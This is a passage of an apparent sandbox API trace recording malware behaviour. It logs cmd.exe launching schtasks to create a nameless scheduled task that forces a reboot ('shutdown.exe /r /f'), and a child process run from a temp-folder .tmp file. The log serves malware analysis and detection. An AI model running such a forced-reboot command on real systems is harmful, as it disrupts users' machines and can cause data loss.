out: lpType=0x2ae738*=0x0, lpData=0x2ae73c*=0x1, lpcbData=0x2ae734*=0x1000) returned 0x2 [0037.671] RegQueryValueExW (in: hKey=0x6c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae738, lpData=0x2ae73c, lpcbData=0x2ae734*=0x1000 | out: lpType=0x2ae738*=0x4, lpData=0x2ae73c*=0x0, lpcbData=0x2ae734*=0x4) returned 0x0 [0037.671] RegQueryValueExW (in: hKey=0x6c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae738, lpData=0x2ae73c, lpcbData=0x2ae734*=0x1000 | out: lpType=0x2ae738*=0x4, lpData=0x2ae73c*=0x40, lpcbData=0x2ae734*=0x4) returned 0x0 [0037.671] RegQueryValueExW (in: hKey=0x6c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae738, lpData=0x2ae73c, lpcbData=0x2ae734*=0x1000 | out: lpType=0x2ae738*=0x4, lpData=0x2ae73c*=0x40, lpcbData=0x2ae734*=0x4) returned 0x0 [0037.671] RegQueryValueExW (in: hKey=0x6c, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae738, lpData=0x2ae73c, lpcbData=0x2ae734*=0x1000 | out: lpType=0x2ae738*=0x0, lpData=0x2ae73c*=0x40, lpcbData=0x2ae734*=0x1000) returned 0x2 [0037.671] RegCloseKey (hKey=0x6c) returned 0x0 [0037.672] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae730 | out: phkResult=0x2ae730*=0x6c) returned 0x0 [0037.672] RegQueryValueExW (in: hKey=0x6c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae738, lpData=0x2ae73c, lpcbData=0x2ae734*=0x1000 | out: lpType=0x2ae738*=0x0, lpData=0x2ae73c*=0x40, lpcbData=0x2ae734*=0x1000) returned 0x2 [0037.672] RegQueryValueExW (in: hKey=0x6c, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae738, lpData=0x2ae73c, lpcbData=0x2ae734*=0x1000 | out: lpType=0x2ae738*=0x4, lpData=0x2ae73c*=0x1, lpcbData=0x2ae734*=0x4) returned 0x0 [0037.672] RegQueryValueExW (in: hKey=0x6c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae738, lpData=0x2ae73c, lpcbData=0x2ae734*=0x1000 | out: lpType=0x2ae738*=0x0, lpData=0x2ae73c*=0x1, lpcbData=0x2ae734*=0x1000) returned 0x2 [0037.672] RegQueryValueExW (in: hKey=0x6c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae738, lpData=0x2ae73c, lpcbData=0x2ae734*=0x1000 | out: lpType=0x2ae738*=0x4, lpData=0x2ae73c*=0x0, lpcbData=0x2ae734*=0x4) returned 0x0 [0037.672] RegQueryValueExW (in: hKey=0x6c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae738, lpData=0x2ae73c, lpcbData=0x2ae734*=0x1000 | out: lpType=0x2ae738*=0x4, lpData=0x2ae73c*=0x9, lpcbData=0x2ae734*=0x4) returned 0x0 [0037.672] RegQueryValueExW (in: hKey=0x6c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae738, lpData=0x2ae73c, lpcbData=0x2ae734*=0x1000 | out: lpType=0x2ae738*=0x4, lpData=0x2ae73c*=0x9, lpcbData=0x2ae734*=0x4) returned 0x0 [0037.672] RegQueryValueExW (in: hKey=0x6c, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae738, lpData=0x2ae73c, lpcbData=0x2ae734*=0x1000 | out: lpType=0x2ae738*=0x0, lpData=0x2ae73c*=0x9, lpcbData=0x2ae734*=0x1000) returned 0x2 [0037.672] RegCloseKey (hKey=0x6c) returned 0x0 [0037.673] time (in: timer=0x0 | out: timer=0x0) returned 0x595667f3 [0037.673] srand (_Seed=0x595667f3) [0037.673] GetCommandLineW () returned="/c schtasks /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST 17:15" [0037.673] GetCommandLineW () returned="/c schtasks /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST 17:15" [0037.674] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f15260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0037.674] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x501fc8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe") returned 0x1b [0037.676] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f20640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0037.676] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f20640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0037.676] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f20640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0037.676] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0037.676] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0037.676] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0037.676] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0037.676] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0037.676] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0037.676] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0037.676] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0037.676] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0037.677] GetEnvironmentStringsW () returned 0x5021d8 [0037.677] FreeEnvironmentStringsW (penv=0x5021d8) returned 1 [0037.677] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f20640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0037.677] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f20640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0037.677] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0037.677] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0037.677] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0037.677] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0037.677] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0037.677] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0037.678] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0037.678] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0037.678] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af4fc | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0037.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x2af4fc, lpFilePart=0x2af4f8 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x2af4f8*="system32") returned 0x13 [0037.678] GetFileAttributesW (lpFileName="C:\\Windows\\system32") returned 0x10 [0037.678] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x2af278 | out: lpFindFileData=0x2af278) returned 0x4f07f0 [0037.679] FindClose (in: hFindFile=0x4f07f0 | out: hFindFile=0x4f07f0) returned 1 [0037.679] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x2af278 | out: lpFindFileData=0x2af278) returned 0x4f07f0 [0037.679] FindClose (in: hFindFile=0x4f07f0 | out: hFindFile=0x4f07f0) returned 1 [0037.679] GetFileAttributesW (lpFileName="C:\\Windows\\System32") returned 0x10 [0037.679] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0037.679] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0037.680] GetEnvironmentStringsW () returned 0x503fb8 [0037.680] FreeEnvironmentStringsW (penv=0x503fb8) returned 1 [0037.680] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f15260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0037.681] GetConsoleOutputCP () returned 0x1b5 [0037.681] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f14260 | out: lpCPInfo=0x49f14260) returned 1 [0037.681] GetUserDefaultLCID () returned 0x409 [0037.682] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f14950, cchData=8 | out: lpLCData=":") returned 2 [0037.683] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af63c, cchData=128 | out: lpLCData="0") returned 2 [0037.683] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af63c, cchData=128 | out: lpLCData="0") returned 2 [0037.683] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af63c, cchData=128 | out: lpLCData="1") returned 2 [0037.683] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f14940, cchData=8 | out: lpLCData="/") returned 2 [0037.683] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f14d80, cchData=32 | out: lpLCData="Mon") returned 4 [0037.683] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f14d40, cchData=32 | out: lpLCData="Tue") returned 4 [0037.684] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f14d00, cchData=32 | out: lpLCData="Wed") returned 4 [0037.684] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f14cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0037.684] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f14c80, cchData=32 | out: lpLCData="Fri") returned 4 [0037.684] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f14c40, cchData=32 | out: lpLCData="Sat") returned 4 [0037.684] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f14c00, cchData=32 | out: lpLCData="Sun") returned 4 [0037.684] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f14930, cchData=8 | out: lpLCData=".") returned 2 [0037.684] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f14920, cchData=8 | out: lpLCData=",") returned 2 [0037.684] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0037.686] GetConsoleTitleW (in: lpConsoleTitle=0x502d90, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0037.687] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74e70000 [0037.687] GetProcAddress (hModule=0x74e70000, lpProcName="CopyFileExW") returned 0x74ea3b92 [0037.687] GetProcAddress (hModule=0x74e70000, lpProcName="IsDebuggerPresent") returned 0x74e84a5d [0037.687] GetProcAddress (hModule=0x74e70000, lpProcName="SetConsoleInputExeNameW") returned 0x74e9a79d [0037.689] _wcsicmp (_String1="schtasks", _String2=")") returned 74 [0037.690] _wcsicmp (_String1="FOR", _String2="schtasks") returned -13 [0037.690] _wcsicmp (_String1="FOR/?", _String2="schtasks") returned -13 [0037.690] _wcsicmp (_String1="IF", _String2="schtasks") returned -10 [0037.690] _wcsicmp (_String1="IF/?", _String2="schtasks") returned -10 [0037.690] _wcsicmp (_String1="REM", _String2="schtasks") returned -1 [0037.690] _wcsicmp (_String1="REM/?", _String2="schtasks") returned -1 [0037.693] GetConsoleTitleW (in: lpConsoleTitle=0x2af334, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0037.694] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0037.694] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0037.694] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0037.694] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0037.694] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0037.694] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0037.694] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0037.694] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0037.694] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0037.695] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0037.695] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0037.695] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0037.695] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0037.695] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0037.695] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0037.695] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0037.695] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0037.695] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0037.695] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0037.695] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0037.695] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0037.695] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0037.695] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0037.695] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0037.695] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0037.695] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0037.695] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0037.695] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0037.696] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0037.696] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0037.696] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0037.696] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0037.696] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0037.696] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0037.696] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0037.696] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0037.696] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0037.696] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0037.696] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0037.696] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0037.696] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0037.696] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0037.696] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0037.696] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0037.696] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0037.696] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0037.697] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0037.697] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0037.697] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0037.697] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0037.697] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0037.697] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0037.697] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0037.697] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0037.697] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0037.697] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0037.697] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0037.697] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0037.697] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0037.697] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0037.812] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0037.812] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0037.812] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0037.812] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0037.813] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0037.813] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0037.813] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0037.813] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0037.813] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0037.813] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0037.813] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0037.813] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0037.813] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0037.813] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0037.813] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0037.813] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0037.813] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0037.813] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0037.813] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0037.813] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0037.813] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0037.813] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0037.813] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0037.813] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0037.813] _wcsicmp (_String1="schtasks", _String2="FOR") returned 13 [0037.814] _wcsicmp (_String1="schtasks", _String2="IF") returned 10 [0037.814] _wcsicmp (_String1="schtasks", _String2="REM") returned 1 [0037.814] _wcsnicmp (_String1="scht", _String2="cmd ", _MaxCount=0x4) returned 16 [0037.815] SetErrorMode (uMode=0x0) returned 0x0 [0037.815] SetErrorMode (uMode=0x1) returned 0x0 [0037.815] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x503fc0, lpFilePart=0x2aee54 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x2aee54*="system32") returned 0x13 [0037.815] SetErrorMode (uMode=0x0) returned 0x1 [0037.815] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f20640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0037.815] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0037.823] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f20640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0037.937] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.937] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.*", fInfoLevelId=0x1, lpFindFileData=0x2aebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aebd0) returned 0x5033a8 [0037.938] FindClose (in: hFindFile=0x5033a8 | out: hFindFile=0x5033a8) returned 1 [0037.938] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.COM", fInfoLevelId=0x1, lpFindFileData=0x2aebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aebd0) returned 0xffffffff [0037.938] GetLastError () returned 0x2 [0037.938] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aebd0) returned 0x5033a8 [0037.938] FindClose (in: hFindFile=0x5033a8 | out: hFindFile=0x5033a8) returned 1 [0037.938] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0037.938] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0037.939] GetConsoleTitleW (in: lpConsoleTitle=0x2af0c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0037.939] InitializeProcThreadAttributeList (in: lpAttributeList=0x2aef50, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af018 | out: lpAttributeList=0x2aef50, lpSize=0x2af018) returned 1 [0037.939] UpdateProcThreadAttribute (in: lpAttributeList=0x2aef50, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af010, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2aef50, lpPreviousValue=0x0) returned 1 [0037.939] GetStartupInfoW (in: lpStartupInfo=0x2aef0c | out: lpStartupInfo=0x2aef0c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0037.939] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.939] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.939] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.939] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.939] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.939] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.939] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.939] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.939] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.939] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.939] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.939] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.939] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.939] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.939] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.940] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.940] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.940] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.940] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.940] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.940] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.940] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.940] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.940] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.940] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.940] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.940] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.940] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.940] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.940] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.940] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.940] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.940] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.941] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.941] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.941] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.941] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.941] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0037.941] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0037.941] lstrcmpW (lpString1="\\schtasks.exe", lpString2="\\XCOPY.EXE") returned -1 [0037.944] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\schtasks.exe", lpCommandLine="schtasks /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST 17:15", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x2aefac*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="schtasks /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST 17:15", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2aeff8 | out: lpCommandLine="schtasks /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST 17:15", lpProcessInformation=0x2aeff8*(hProcess=0x7c, hThread=0x78, dwProcessId=0x99c, dwThreadId=0x9a0)) returned 1 [0037.952] CloseHandle (hObject=0x78) returned 1 [0037.952] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0037.952] GetEnvironmentStringsW () returned 0x504178 [0037.952] FreeEnvironmentStringsW (penv=0x504178) returned 1 [0037.952] WaitForSingleObject (hHandle=0x7c, dwMilliseconds=0xffffffff) returned 0x0 [0039.763] GetExitCodeProcess (in: hProcess=0x7c, lpExitCode=0x2aeeec | out: lpExitCode=0x2aeeec*=0x0) returned 1 [0039.764] CloseHandle (hObject=0x7c) returned 1 [0039.764] _vsnwprintf (in: _Buffer=0x2af034, _BufferCount=0x13, _Format="%08X", _ArgList=0x2aeef8 | out: _Buffer="00000000") returned 8 [0039.764] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0039.764] GetEnvironmentStringsW () returned 0x507598 [0039.764] FreeEnvironmentStringsW (penv=0x507598) returned 1 [0039.764] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0039.764] GetEnvironmentStringsW () returned 0x507598 [0039.765] FreeEnvironmentStringsW (penv=0x507598) returned 1 [0039.765] DeleteProcThreadAttributeList (in: lpAttributeList=0x2aef50 | out: lpAttributeList=0x2aef50) [0039.765] _get_osfhandle (_FileHandle=1) returned 0x7 [0039.765] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0039.766] _get_osfhandle (_FileHandle=1) returned 0x7 [0039.766] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f141ac | out: lpMode=0x49f141ac) returned 1 [0039.766] _get_osfhandle (_FileHandle=0) returned 0x3 [0039.766] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f141b0 | out: lpMode=0x49f141b0) returned 1 [0039.766] SetConsoleInputExeNameW () returned 0x1 [0039.766] GetConsoleOutputCP () returned 0x1b5 [0039.767] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f14260 | out: lpCPInfo=0x49f14260) returned 1 [0039.767] SetThreadUILanguage (LangId=0x0) returned 0x409 [0039.767] exit (_Code=0) Process: id = "3" image_name = "6b4.tmp" filename = "c:\\users\\hjrd1k~1\\appdata\\local\\temp\\6b4.tmp" page_root = "0x7069a000" os_pid = "0x970" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x948" cmd_line = 